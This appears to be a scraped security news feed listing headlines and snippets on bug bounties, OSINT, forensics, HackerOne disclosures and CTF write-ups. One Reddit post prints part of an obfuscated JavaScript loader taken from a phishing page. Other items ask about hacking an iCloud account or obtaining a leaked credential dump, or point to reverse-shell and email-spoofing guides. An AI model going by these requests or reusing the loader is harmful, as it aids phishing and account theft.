    Learning Web-Sec — Day 12 - Authentication Vulnerabilities
    Broken Brute-Force Protection, IP Block Continue reading on System Weakness »
    Another day, Another major flaw this time in the TransUnion that allows bypassing security
    Here we go. Again. Continue reading on InfoSec Write-ups »
    JWT authentication bypass via unverified signature — Portswigger Simple Solution Writeup | 2023
    Portswigger Lab Solution — JWT Authentication Bypass by Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Open Redirect
    Merhabalar bugün Open Redirect zafiyeti üzerine yazıyorum. Continue reading on Medium »
    Control Web Panel RCE Vulnerability
    What is RCE ? Continue reading on Medium »
    Finding CVE-2022–3786 (openssl) with Mayhem
    What is the bug? Continue reading on Medium »
    Penetration Testing XML-RPC: Uncovering the Weaknesses
    An Introduction to XML-RPC: Understanding the Basics of Remote Procedure Call Continue reading on Medium »
    The Top 5 Bug Bounty Hunting Automation Tools
    TL;DR:- My favorite bug bounty hunting tools for website pen-testing automation. Great for cybersecurity beginners, or advanced red-team… Continue reading on The Gray Area »
    How a Ukrainian developer quaked the French government.
    A true story, that happened a few years ago to a colleague. Continue reading on Medium »
  • Open

    Looking for a tool that functions like fiwalk but for the APFS filesystem.
    As the title says, looking for a tool that take stats of the APFS filesystem similar to fiwalk. I have looked at afro, and sleuthkit 4.11. I'm wondering if there is a tool/lib that I'm missing. submitted by /u/ahhjesus [link] [comments]
    Mobile phone imaging
    Hello:) I’m currently studying computer forensics and I am doing my dissertation on mobile forensics. This involves me imaging mobile phone devices. I would like to ask if anyone has a methodology into figuring out how to image a mobile device? I definitely need to retain as much data as possible so I would ideally prefer not to root or jailbreak the phones involved. submitted by /u/War_Maiden_ [link] [comments]
    how can i learn digital forensics?
    I'm a fresh grad of Forensic Science, we had Digital Forensic but for a quarter only and it wasn't that in depth. We weren't taught how to program and the likes, we only learned the basic terms used in Digital Forensic. I'd like to pursue a career in Digital Forensic, however, i don't have any programming or IT background, but I'm willing to learn and take online certificates. Do you think it's possible to self-taught everything in Digital Forensic? and if so, can you help me where to start, what is the must that i should know, and what to prioritize? thank you! submitted by /u/AdOdd5751 [link] [comments]
    Raid-5 reconstruction from images
    Hello everyone, I seek to combine 6 seperate RAID-5 images (e01) into one complete one. I found this guide from Medium called How to Combine RAID Array images in EnCase. but my version of Encase does not show the same options as in the guide so I wonder how you guys would go about reassembling the images? What tools would you use? Any and all help is appreciated. submitted by /u/stormer14789 [link] [comments]
  • Open

    what do you think about that ?🧑‍💻🧠
    submitted by /u/devnatech [link] [comments]
    DLL Hijacking outside DllMain, using Spartacus
    submitted by /u/h0wlett [link] [comments]
    Is it possible to hack iCloud info for missing person (last known location of phone)
    submitted by /u/beeksoner [link] [comments]
  • Open

    Top 3 OSINT tools
    Welcome to our latest blog post, where we will be discussing the top 3 OSINT (Open-Source Intelligence) tools that can help you… Continue reading on Medium »
    How to find out on what dates a web page was changed using archive.org
    Archive.org is a unique tool that allows you to look up the history of a site since its inception (but not before 1996) and find data that… Continue reading on Medium »
    OSİNT nədir?
    OSİNT, sosial media paylaşımlarından, TV, radio yayınlarına qədər internet üzərindən açıq olan informasiyaların analiz edilməsi, bu analiz… Continue reading on Medium »
    The simplest guide to scraping with Google Sheets
    There are so many ways to collect data from web pages. Examples: Continue reading on Medium »
    Critical Vulnerability through OSINT only
    Hi everyone, today I want to show you a very quick way that I used to get a Critical Vulnerability by using basic OSINT only. Continue reading on Medium »
    SPY NEWS: 2023 — Week 2
    Summary of the espionage-related news stories for the Week 2 (January 8–14) of 2023. Continue reading on Medium »
  • Open

    Show HN: CVE Vulnerability Info Downloader – Including Dashboard for OpenVAS
    Article URL: https://github.com/trinitor/CVE-Vulnerability-Information-Downloader Comments URL: https://news.ycombinator.com/item?id=34392543 Points: 2 # Comments: 0
  • Open

    Show HN: CVE Vulnerability Info Downloader – Including Dashboard for OpenVAS
    Article URL: https://github.com/trinitor/CVE-Vulnerability-Information-Downloader Comments URL: https://news.ycombinator.com/item?id=34392543 Points: 2 # Comments: 0
    Google Chrome Security Vulnerability Detected Could Lead to Crypto Wallet Steal
    Article URL: https://news.coincu.com/160500-google-chrome-security-flaw/ Comments URL: https://news.ycombinator.com/item?id=34391767 Points: 2 # Comments: 0
  • Open

    Bind Shell & Reverse
    As far as I know, a bind shell originates when the attacker sets on target machine a listener for incoming connections at a $port and then they connect to it by inputting $ip:$port of the target. A reverse shell switches things so the attacker machine will be the one listening. Cool. I feel confused about it. In the context of me doing exercises, spawning bind/reverse shells between windows and Linux, I feel something more is lost that would help me really differentiate them when a tasks asks: Make a bind shell on windows and connect to it via linux. Does it mean windows need to be listening or Linux? I feel it could also mean that Linux should be listening. Moreover, what are the concerns between using bind over reverse? A bind is inconvenient because it sets the target to have a listening port that exposes them, correct? Are there more differences? submitted by /u/DerekFoReal777 [link] [comments]
    Github.com rasies "Connection not secure" on my workplaces LAN. Fine on my phone & and everywhere else. Why?
    My workplace has a super strict blacklist of websites. As a developer I cannot do my job without github so I bring my laptop and surf on my phones data. Phones was getting slow so I tried to use the work WIFI and github.com raises a "HTTP CERTIFICATE EXPIRED' error. What is this? Is this some trivial quirk, or some vulnerability I need to mention to my superiors? submitted by /u/BigBootyBear [link] [comments]
    XSRF will never happen if I only use POST request to send sensitive request?
    Since XSRF is such a well known thing, there are a massive amount of blog post and resource written by people who barely know what XSRF is technically so it's quite difficult for me to understand XSRF in details. However I have come up with the conclusion based on my current understanding that XSRF will never happen if a website only use POST request to send sensitive stuff like delete account. By this I mean there will be no way a user click on a sketchy link and got their account deleted if a website only implement their requests with POST. Here is the sample code of a nodejs webserver, I have also attached sample GET and POST XMLHttpRequest that the attacker can use.Code with syntax highlighting in pastebin: https://pastebin.com/gaVdLCc3 const express = require('express'); const app …
    IPS Deployment Best Practices - This Post is Aimed for Beginner in Network Security
    This post will discuss IPS and the benefits it provides to organisations when configured and implemented correctly. The bad news is that many organisations are not utilising their IPS effectively. In many cases, they have just enabled the IPS on their edge firewalls, thinking that they are now protected against known attacks. What is an IPS? An intrusion prevention system (IPS) - sometimes referred to as an intrusion detection prevention system (IDPS) - is a network security technology and an integral part of any enterprise security system that continuously monitors network traffic for suspicious activity and takes steps to prevent it. By reducing manual work for security teams and allowing other security products to perform more efficiently, IPS solutions help filter out malicious act…
  • Open

    Any discord servers for exploit dev?
    submitted by /u/Peixetlift [link] [comments]
  • Open

    SecWiki News 2023-01-15 Review
    SecWiki周刊(第462期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-15 Review
    SecWiki周刊(第462期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Indian startup -LensKart leaked the personal information of 7 million customers and several staff…
    No content preview
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    No content preview
    How to Create Incident Response Plan?
    No content preview
    Domain Name System 0x1 | DNS 101
    No content preview
    How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
    No content preview
    Free Cloud (Browser-based) Labs of DVWA and bWAPP
    No content preview
    QuillAudit CTF challenges — Writeups
    Solutions of all retired challenges can be found here. Continue reading on InfoSec Write-ups »
    OWASP TOP 10
    No content preview
    Identifying Coin Scammers with Wallet-Tracker
    No content preview
    What You Need to Know About The CISSP Exam?
    To prepare for the Certified Information Systems Security Professional (CISSP) exam, you should first familiarize yourself with the exam… Continue reading on InfoSec Write-ups »
  • Open

    Indian startup -LensKart leaked the personal information of 7 million customers and several staff…
    No content preview
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    No content preview
    How to Create Incident Response Plan?
    No content preview
    Domain Name System 0x1 | DNS 101
    No content preview
    How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
    No content preview
    Free Cloud (Browser-based) Labs of DVWA and bWAPP
    No content preview
    QuillAudit CTF challenges — Writeups
    Solutions of all retired challenges can be found here. Continue reading on InfoSec Write-ups »
    OWASP TOP 10
    No content preview
    Identifying Coin Scammers with Wallet-Tracker
    No content preview
    What You Need to Know About The CISSP Exam?
    To prepare for the Certified Information Systems Security Professional (CISSP) exam, you should first familiarize yourself with the exam… Continue reading on InfoSec Write-ups »
  • Open

    Indian startup -LensKart leaked the personal information of 7 million customers and several staff…
    No content preview
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    No content preview
    How to Create Incident Response Plan?
    No content preview
    Domain Name System 0x1 | DNS 101
    No content preview
    How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
    No content preview
    Free Cloud (Browser-based) Labs of DVWA and bWAPP
    No content preview
    QuillAudit CTF challenges — Writeups
    Solutions of all retired challenges can be found here. Continue reading on InfoSec Write-ups »
    OWASP TOP 10
    No content preview
    Identifying Coin Scammers with Wallet-Tracker
    No content preview
    What You Need to Know About The CISSP Exam?
    To prepare for the Certified Information Systems Security Professional (CISSP) exam, you should first familiarize yourself with the exam… Continue reading on InfoSec Write-ups »
  • Open

    Finding CVE-2022–3786 (openssl) with Mayhem
    What is the bug? Continue reading on Medium »
  • Open

    Finding CVE-2022–3786 (openssl) with Mayhem
    What is the bug? Continue reading on Medium »
  • Open

    FreeBuf早报 | Tiktok在法国被罚540万美元;思科发出商业路由器漏洞警告
    因违反 cookie 同意规则,法国数据保护监管机构对短视频平台 TikTok 处以500 万欧元(约540万美元)罚款。
  • Open

    Western Horizon Technologies TI 99/4a and Geneve Archive
    http://www.whtech.com/ftp/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    i know nothing
    Im completely new to computer stuff in general like ik how to google simple stuff and how to play pc games lol but how do i get started in personal cyber security like i just downloaded john the ripper to play with just to relize how little i understand computers so where do i start to help me understand what to do and how to learn cyber security like coding would help but idk if thats necessary what i should start with so where should i start to understand any of this? submitted by /u/brother_alpharius [link] [comments]

  • Open

    How to view the history of a social media profile name using the Archive.org CDX API. 4 steps guide
    When collecting information about a person, it is sometimes important to see how websites and social media pages associated with them have… Continue reading on Medium »
  • Open

    Security engineering book recommendations?
    Hi friends! I am looking for recommendations if you have any about good foundational and "advanced" (if there are any) that are more focus on development/architecture side of security engineering. The only books I've read on SecEng has been the "Guide to building dependable distributed systems" book by Ross Anderson and "How to measure anything in Cyber–Security Risk" by Hubbard. I'm sure there are plenty of other books out there, but I've been having the hardest time making decisions on which ones to read as I could not really find lists of SecEng-related books that seems to contain the same 2-3 books out a list of "top 10". Was hoping to get pointed in the right direction. Thanks! submitted by /u/CaseCosmix [link] [comments]
    Is SSH to a compromised server a security risk?
    A client SSHs into a server that has been compromised. Is this SSH connection a security risk for the client? In the next scenario, the client backs up files from the server to its local machine over SSH in the pull mode, using, eg, “rsync server@ip:/files mybackup”. Is this rsync connection a security risk for the client? (Other than, of course, downloading the attacker’s files). submitted by /u/chaplin2 [link] [comments]
    What are the possibilities, if any, than an organization or individual corrupted the files that shut down the U.S. airways?
    I'm just curious if thus could have been a cyber security attack against our infrastructure. Please ELI5 since I am not an industry professional. submitted by /u/exstaticj [link] [comments]
    Is the AWS Solutions Architect and/or AWS Certified Security worth it?
    Working as a security engineer and work with AWS, not all the time, but frequently enough. I'd like to improve my skills in this regard. Are these certs worth it in the industry? submitted by /u/herbertisthefuture [link] [comments]
  • Open

    “Unleashing the Power of Python to Uncover the Root Cause of SQL Injection Attacks”
    SQL injection is a type of security vulnerability that occurs when an attacker is able to insert malicious SQL code into a web application… Continue reading on Medium »
    The Life of a Hacker: A Look Behind the Scenes
    When we think of hackers, we often imagine shadowy figures sitting in front of computer screens, breaking into systems and stealing… Continue reading on Medium »
    Hacking: The Dark Side of the Digital World
    Hacking, the art of exploiting vulnerabilities in computer systems, has become a hot topic in today’s digital world. From small-scale… Continue reading on Medium »
    SQL injection in Depth
    SQL injection is a type of security vulnerability that occurs when an attacker is able to insert malicious code into an SQL statement… Continue reading on Medium »
    Dexalot HackenProof Hata Ödülü
    Dexalot, Merkezi Limitli Emir Defteri özelliğine sahip, gözetim altında olmayan, merkeziyetsiz bir kripto para borsasıdır. Avalanche… Continue reading on Dexalot »
    How Browser’s Save As Feature might lead to Code Execution (CVE-2022–45415)
    Few days ago, while I was exploring browser based bugs, I read a article over internet explaining about a path traversal vulnerability in… Continue reading on InfoSec Write-ups »
    The World of SMTP SPF and DMARC and Potential bugs
    This week i was more interested in how emails are protected and the smtp protocol in general so was learning more on that , Email security… Continue reading on Medium »
    Bug Hunting 101: Directory Enumeration & Authentication Bypass
    TL;DR- A quick write-up on the best methods I’ve used for bug bounties that included directory issues and authentication vulnerabilities… Continue reading on The Gray Area »
    Easy XSSHunter Express Setup Script
    With xsshunter.com shutting down setting up your own xsshunter will be more important. This script will make it a lot easier Continue reading on Medium »
  • Open

    Analysis of FG-IR-22-398 – FortiOS - heap-based buffer overflow in SSLVPNd
    submitted by /u/Gallus [link] [comments]
    Impact of the CircleCI Security Incident on the Datadog Agent
    submitted by /u/dlorenc [link] [comments]
    santa-linux: a proof of concept binary authorization system for linux, based on Google's Santa
    submitted by /u/ahigherporpoise [link] [comments]
  • Open

    Module archive
    https://ftp.modland.com/pub/modules/ submitted by /u/Waste-Release-6235 [link] [comments]
    [NSFW] Wordpress indexes of nudity.
    https://playblog.ws/play/wp-content/uploads/ https://commentseduire.net/wp-content/uploads/ https://femdom-joi.com/wp-content/uploads/ submitted by /u/ringofyre [link] [comments]
    Bunch of ebooks
    https://gutenberg.ca/ebooks/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Moving to bugbounty.
    So, due to some /financial/ problems I am moving to bugbounty keeping mind "I will do better for them". I will be back then after one year. What you awesome guys do think am I doing right or wrong. Need suggestions. Regards iyamroshan. submitted by /u/Iyamroshan [link] [comments]
  • Open

    SecWiki News 2023-01-14 Review
    最佳实践:如何固化IP画像流程 by ourren Forrester:2022年安全分析平台厂商评估 by ourren 涉网犯罪分析赛道之“N0nE429”战队Writeup by ourren 网络流量分析赛道之“见世面”战队Writeup by ourren 开源生态中软件包相关的安全问题研究 by ourren 域内定位个人PC的三种方式 by ourren 《智胜空天·安全护航》无人机现状观察及安全分析报告 by ourren 2022年CCF B级以上期刊fuzz论文汇总 by ourren Web3 安全-链上威胁分析教学 by ourren 人工智能技术在态势感知的应用 by ourren 网络爬虫犯罪的量刑问题及对策 by ourren 魔改后的CIA攻击套件Hive进入黑灰产领域 by ourren 攻防技术创新探究 by ourren 全球首个太空网络威胁战技术框架发布 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-14 Review
    最佳实践:如何固化IP画像流程 by ourren Forrester:2022年安全分析平台厂商评估 by ourren 涉网犯罪分析赛道之“N0nE429”战队Writeup by ourren 网络流量分析赛道之“见世面”战队Writeup by ourren 开源生态中软件包相关的安全问题研究 by ourren 域内定位个人PC的三种方式 by ourren 《智胜空天·安全护航》无人机现状观察及安全分析报告 by ourren 2022年CCF B级以上期刊fuzz论文汇总 by ourren Web3 安全-链上威胁分析教学 by ourren 人工智能技术在态势感知的应用 by ourren 网络爬虫犯罪的量刑问题及对策 by ourren 魔改后的CIA攻击套件Hive进入黑灰产领域 by ourren 攻防技术创新探究 by ourren 全球首个太空网络威胁战技术框架发布 by ourren 更多最新文章,请访问SecWiki
  • Open

    Red Team Capability Maturity Model
    Hey folks, just wanted to alert people to a new resource that was released yesterday to help measure/report on/plan for team maturity in a standardized way. There's a blog post on the site that goes into a little more detail in addition to the CMM itself. https://www.redteammaturity.com submitted by /u/Tai-Daishar [link] [comments]
  • Open

    Uninstalling Mattermost Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication
    Mattermost disclosed a bug submitted by annonmous: https://hackerone.com/reports/1797661
  • Open

    BitRAT 正以银行敏感数据为诱饵进行传播
    研究人员发现攻击者劫持了哥伦比亚银行的基础设施,并且利用来自银行的敏感数据作为诱饵。
  • Open

    Article on Hacksudo Search box solving
    Topic Covered Continue reading on Medium »
    Bug Hunting 101: Directory Enumeration & Authentication Bypass
    TL;DR- A quick write-up on the best methods I’ve used for bug bounties that included directory issues and authentication vulnerabilities… Continue reading on The Gray Area »
  • Open

    Article on Hacksudo Search box solving
    Topic Covered Continue reading on Medium »
    Bug Hunting 101: Directory Enumeration & Authentication Bypass
    TL;DR- A quick write-up on the best methods I’ve used for bug bounties that included directory issues and authentication vulnerabilities… Continue reading on The Gray Area »
  • Open

    Photobomb — HackTheBox Machine Simple Writeup | 2023
    No content preview
    OpenAI ChatGPT for Cyber Security
    No content preview
    Kerberos Authentication (again… but better)
    No content preview
    HTML injection in an email template
    No content preview
    Discovering vulnerabilities quickly with targeted scanning — Portswigger
    No content preview
    AWS EC2 Auto Scaling Privilege Escalation
    No content preview
    Shoppy — HackTheBox Machine Simple Writeup | 2023
    No content preview
  • Open

    Photobomb — HackTheBox Machine Simple Writeup | 2023
    No content preview
    OpenAI ChatGPT for Cyber Security
    No content preview
    Kerberos Authentication (again… but better)
    No content preview
    HTML injection in an email template
    No content preview
    Discovering vulnerabilities quickly with targeted scanning — Portswigger
    No content preview
    AWS EC2 Auto Scaling Privilege Escalation
    No content preview
    Shoppy — HackTheBox Machine Simple Writeup | 2023
    No content preview
  • Open

    Photobomb — HackTheBox Machine Simple Writeup | 2023
    No content preview
    OpenAI ChatGPT for Cyber Security
    No content preview
    Kerberos Authentication (again… but better)
    No content preview
    HTML injection in an email template
    No content preview
    Discovering vulnerabilities quickly with targeted scanning — Portswigger
    No content preview
    AWS EC2 Auto Scaling Privilege Escalation
    No content preview
    Shoppy — HackTheBox Machine Simple Writeup | 2023
    No content preview
  • Open

    Footprinting/Fingerprinting
    Footprinting y fingerprinting son términos relacionados pero que tienen un enfoque ligeramente diferente. Continue reading on Medium »

  • Open

    Can anyone help deobfuscate this JS found in cred phishing attack ?
    seems like this was loading during a credential phish attack I was looking at . It was originally base64 encoded and wrapped in eval(atob(“ “)); I’ve gotten it decoded but now I’m lost. Attack was thwarted but I’m really curious what the code does. It was your standard fake MS portal phishing attack var _0x22c0a8 = _0x1057; (function(_0x4ce139, _0x4f4b54) { var _0x15c7b0 = _0x1057, _0xbea43e = _0x4ce139(); while (!![]) { try { var _0x56e5e2 = -parseInt(_0x15c7b0(0x156)) / 0x1 + -parseInt(_0x15c7b0(0x15e)) / 0x2 * (parseInt(_0x15c7b0(0x172)) / 0x3) + parseInt(_0x15c7b0(0x15d)) / 0x4 + parseInt(_0x15c7b0(0x164)) / 0x5 + -parseInt(_0x15c7b0(0x16d)) / 0x6 * (parseInt(_0x15c7b0(0x16e)) / 0x7) + -parseInt(_0x15c7b0(0x154)) / 0x8 * (-parseInt(_0x15c7b0(0x173)) / 0x9) + parseInt(_0x15c7b0(0x168))…
    What happens to cyber functions after a breach?
    We see so many breaches these days especially the more recent ones this year with the Royal Mail in the UK What usually happens after a breach has occurred, as in when the investigation is ongoing? Always curious to know whether cyber functions are sacked from their job or whether they are grilled. Because this side of the story is very rarely published in the press well in the UK anyways with likes of BBC. Is it different in the UK? submitted by /u/vayigos [link] [comments]
    Is helpdesk a trap?
    Sup guys, A piece of advice that seems to be thrown around a lot is that helpdesk positions are a good way to break into infosec sectors, for new grads. To what extent is this really true? What would be some other (hopefully better) ways to achieve similar results? submitted by /u/gekdgsbsl [link] [comments]
    SOC 2 supplemental criteria
    The company is getting a product area audited for SOC 2. I have the trust-services-criteria 2020.pdf but I don't understand where the supplemental criteria are specified. For example the PI Series criteria is mentioned on page 5, but is this defined in another doc that I cannot find? submitted by /u/ScreamOfVengeance [link] [comments]
    PowerShell signed scripts
    Hello, In my company we plan to use signed PowerShell scripts, are there any drawbacks and/or security problems with this? Are they really safe when you deploy them on a fleet of computers, what happens when the certificate expires, etc ? ​ Thanks by advance submitted by /u/hthouzard [link] [comments]
    Is forwarding a port on your router a risk when the destination is turned off?
    Hi, Is forwarding a port on your router a risk when the destination is turned off? For example, I have figured out a way to start a vm on my network on demand through a cron job. I am just wondering if the port forward itself poses any risk when the vm is off? Thanks, Chris submitted by /u/chrispercol [link] [comments]
    Best password manager? Actually best?
    I am using lastpass for a long time, a while ago they changed the price and the free tier sucks now. I use it mainly because of 2FA sync “ side note, the sync also sucks “ . I use my phon heavily and almost every phone I owned I changed on the warranty. Anyway I wanted to hear Reddit about a nice free alternative or even cheap one. Maybe self hosted ones as well since I run my own servers so I can throw a docker in there for passwords. Any suggestions? UPDATE: wow the majority suggested bitwarden. I went with the unofficial community version for the 2FA. I wish the official one offers 2FA for free submitted by /u/squadfi [link] [comments]
  • Open

    Robots.txt file with potentially sensitive content.
    Yelp disclosed a bug submitted by ethack1886: https://hackerone.com/reports/1724771
    Critical sensitive information Disclosure. [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by berserkbd47: https://hackerone.com/reports/1626236 - Bounty: $500
    Wordpress Takeover using setup configuration at http://.edu [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by berserkbd47: https://hackerone.com/reports/1626205 - Bounty: $1000
    Github app Privilege Escalation to Administrator/Owner of the Organization
    GitHub disclosed a bug submitted by vaib25vicky: https://hackerone.com/reports/1732595 - Bounty: $10000
    Reference caching can leak data to unauthorized users
    Nextcloud disclosed a bug submitted by systemkeeper: https://hackerone.com/reports/1767503
  • Open

    CircleCI incident report for January 4, 2023 security incident
    submitted by /u/baty0man_ [link] [comments]
    A Public Git repository & misconfiguration detection tool
    submitted by /u/nicksthehacker_ [link] [comments]
    🚀 Announcing Matano + Suricata: Build your own Security Data Lake on AWS using Suricata Logs
    submitted by /u/shaeqahmed [link] [comments]
    Announcing a stable release of sigstore-python
    submitted by /u/yossarian_flew_away [link] [comments]
    Crassus: Windows privilege escalation discovery tool
    submitted by /u/Fugitif [link] [comments]
    How to use Open Source CloudQuery for Attack Surface Management and Graph Visualization for Cloud and AWS | CloudQuery
    submitted by /u/jsonpile [link] [comments]
    Bad things come in large packages: .pkg signature verification bypass on macOS
    submitted by /u/xnyhps [link] [comments]
  • Open

    10 very simple tips for OSINT tool developers
    There are 4,329 repositories on Github using the keyword OSINT. Continue reading on Medium »
    The 10 Commandments of Open Source Intelligence
    No doubt about it, OSINT’s moment has arrived. Propelled by an ever-increasing volume of public information and rapid geo-political… Continue reading on The First Digit »
    The 10 Commandments of Open Source Intelligence
    No doubt about it, OSINT’s moment has arrived. Propelled by an ever-increasing volume of public information and rapid geo-political… Continue reading on Medium »
  • Open

    Nucleon Public Incentivized Testnet & Bug Activity || Zero Investment Airdrop || Join Now.
    NUCLEON Announcing Incentivized Testnet Activity Continue reading on Medium »
    Learning Web-Sec - Day 11 - Authentication Vulnerabilities
    Username enumeration via response timing - PortSwigger Lab Walkthrough. Continue reading on System Weakness »
    Recompensas por fallos de Dexalot de HackenProof
    Dexalot es un exchange de criptomoactivos non-custodial y descentralizado con capacidad de Libro Central de Ordenes Límite. Impulsado por… Continue reading on Dexalot »
    Bounty Bug Dexalot Di HackenProof
    Dexalot adalah bursa terdesentralisasi cryptocurrency dengan fitur non-custodial Central Limit Order Book yang didukung oleh Avalanche… Continue reading on Dexalot »
    Bug Zero at a Glance [Week 07 - 13 January]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Dexalot HackenProof Bug Bounty
    Dexalot is a non-custodial, decentralized cryptocurrency exchange with a Central Limit Order Book capability. Continue reading on Dexalot »
    All about: Business Logic Bugs
    بسم الله الرحمن الرحيم (In The Name of Allah Most Gracious Most Merciful) Continue reading on Medium »
    BOUNTY HACKER ON TRYHACKME
    The Second challenging room in the beginners path the in Bounty hacker in Tryhackme Continue reading on Medium »
    Bug Bounty Guide and Tools
    What is Bug Bounty Program? Continue reading on Medium »
    ✅ Best commands for Port Scanning — For OSCP, pentests, bug bounties
    In a penetration testing engagement, scanning is a very important phase in which we get to know better the potential vulnerabilities of… Continue reading on Medium »
  • Open

    Any hints how to injest in bloodhound an offline (extracted) ntds.dit file ?
    submitted by /u/StyGre [link] [comments]
    Measuring Sliver vs Havoc
    submitted by /u/Diesl [link] [comments]
  • Open

    Our team’s vulnerabilities disclosures 2022
    Our cybersecurity researchers devote time to reporting vulnerabilities in open-source projects we use every day, but our interests are… Continue reading on Faraday »
    FuzzingWeekly CW 2 — free hacking tools that are good for appsec
    These free tools for hackers are also good for application security QA: https://thestack.technology/free-fuzzing-tools-in-2023/ Continue reading on Medium »
    Pwn OWASP WebGoat with fuzz testing
    31 bugs in 4 minutes and 54% code coverage, new era feedback-based fuzz testing like CI Fuzz needs to be in your CICD. Continue reading on Medium »
  • Open

    Our team’s vulnerabilities disclosures 2022
    Our cybersecurity researchers devote time to reporting vulnerabilities in open-source projects we use every day, but our interests are… Continue reading on Faraday »
    FuzzingWeekly CW 2 — free hacking tools that are good for appsec
    These free tools for hackers are also good for application security QA: https://thestack.technology/free-fuzzing-tools-in-2023/ Continue reading on Medium »
    Pwn OWASP WebGoat with fuzz testing
    31 bugs in 4 minutes and 54% code coverage, new era feedback-based fuzz testing like CI Fuzz needs to be in your CICD. Continue reading on Medium »
  • Open

    Exploiting Application Logic to Phish Internal Mailing Lists
    Tasked with performing a Red Team engagement on a tech company, I had to get creative to phish my way into their most critical assets. Continue reading on Medium »
    Bypass Windows Defender with a Reverse Shell
    Introduction Continue reading on Medium »
  • Open

    SecWiki News 2023-01-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-01-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Movie scans
    https://www.doctormacro.com/Images/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Endianness ( Big / Little Endian ) Concept for Exploit Developers
    No content preview
    Juicy Details — TryHackMe Writeup
    No content preview
    Lost Modulus — HackTheBox Crypto Challenge(RSA) Simple Writeup | 2023
    No content preview
    Strange 2FA Misconfiguration
    No content preview
    Clear communication is crucial: why writing effective vulnerability reports matters
    No content preview
    JNDI Injection Series: RMI Vector — The Final Piece of The Puzzle
    No content preview
    6 Tips for a More Secure Supply Chain
    Software supply chain security is a critical concern for organizations, find out how to make yours more secure using industry best… Continue reading on InfoSec Write-ups »
    Soccer — Hack The Box | Writeup with Flag | 2023
    No content preview
  • Open

    Endianness ( Big / Little Endian ) Concept for Exploit Developers
    No content preview
    Juicy Details — TryHackMe Writeup
    No content preview
    Lost Modulus — HackTheBox Crypto Challenge(RSA) Simple Writeup | 2023
    No content preview
    Strange 2FA Misconfiguration
    No content preview
    Clear communication is crucial: why writing effective vulnerability reports matters
    No content preview
    JNDI Injection Series: RMI Vector — The Final Piece of The Puzzle
    No content preview
    6 Tips for a More Secure Supply Chain
    Software supply chain security is a critical concern for organizations, find out how to make yours more secure using industry best… Continue reading on InfoSec Write-ups »
    Soccer — Hack The Box | Writeup with Flag | 2023
    No content preview
  • Open

    Endianness ( Big / Little Endian ) Concept for Exploit Developers
    No content preview
    Juicy Details — TryHackMe Writeup
    No content preview
    Lost Modulus — HackTheBox Crypto Challenge(RSA) Simple Writeup | 2023
    No content preview
    Strange 2FA Misconfiguration
    No content preview
    Clear communication is crucial: why writing effective vulnerability reports matters
    No content preview
    JNDI Injection Series: RMI Vector — The Final Piece of The Puzzle
    No content preview
    6 Tips for a More Secure Supply Chain
    Software supply chain security is a critical concern for organizations, find out how to make yours more secure using industry best… Continue reading on InfoSec Write-ups »
    Soccer — Hack The Box | Writeup with Flag | 2023
    No content preview
  • Open

    典型挖矿家族系列分析三 |Sysrv-hello挖矿蠕虫
    Sysrv-hello是一个利用多种漏洞传播的Windows和Linux双平台挖矿蠕虫,主要目的在于传播挖矿蠕虫,继而实现挖矿获利。
    REST-Attacker:一款针对REST应用的安全研究框架
    REST-Attacker是一款针对REST应用安全的研究框架,允许研究人员针对遵循REST架构风格的API执行自动化的渗透测试与安全研究。

  • Open

    Python Port Scanner Lab!
    R. Eric Kiser Continue reading on Medium »
    SCCM Site Takeover via Automatic Client Push Installation
    tl;dr: Install hotfix KB15599094 and disable NTLM for client push installation. Continue reading on Posts By SpecterOps Team Members »
  • Open

    “and to search their networks for signs the vulnerability had been exploited on their networks.” how would you do this type of scan? What tools would you use?
    Fortigate just announced a vulnerability in their firewall devices period in the article they said that their customers should scams for signs of vulnerabilities under network period how would you do this? What tools would use? My question is specific to this scenario. https://arstechnica.com/information-technology/2023/01/fortinet-says-hackers-exploited-critical-vulnerability-to-infect-vpn-customers/ submitted by /u/youreadumbmf35 [link] [comments]
    Anyone got the Exploit.In dump?
    I have a very old email and I don't remember it's password (haven't logged in it since 2017) . I know that it got hit by the exploit and I was wondering if maybe I could find it there. submitted by /u/PresentationHot1261 [link] [comments]
    Curious about this.
    My facebook got hacked recently, and I get a little paranoid of what's the hacker's motive. So my Facebook account was retrieved via email, and while checking the logs and notifications the only things that the hacker did is remove my access to one of my inactive page (totally didnt care about this), and added a contact number on my profile which is a number for Vietnam (I'm not from Vietnam), and the hacker's location as per Facebook is on United States. Anyone else here experienced the same scenario recently? What's the hacker's motive? submitted by /u/frenchie_20 [link] [comments]
    Researching SIEM
    I'm currently the Security Engineer focusing on our threat detection efforts. I come from a Splunk workshop, but we're currently using Google Chronicle. Google Chronicle lacks an online community. The documentation is vague and not as helpful and there's no training available for the product. I'm realizing that the product lacks a lot of the features that I have come accustomed to. What SIEMS are you using and what were the reasons you chose the SIEM? submitted by /u/tayvionp [link] [comments]
    Threat hunter skillset and roadmap analysis
    Hi /r/AskNetsec, I'm interested in becoming a threat hunter but I don't know where to begin and I could use some mentoring. I'm actively looking for a cybersecurity mentor to help me on my journey. A little about me: I have 5 years of experience as a Security Engineer. I specialize in identity and access management and cloud security. My organization is 100% cloud-based and we use the Microsoft security stack to manage our systems and technologies. I have experience in digital forensics, cryptography, network security, and compliance. I also have a master's degree in cybersecurity. Here are the key technical skills I've defined to being an effective threat hunter. I'm rating my understanding from 1-5, with 1 being no knowledge, 3 being average, to 5 being an expert, and they are in no c…
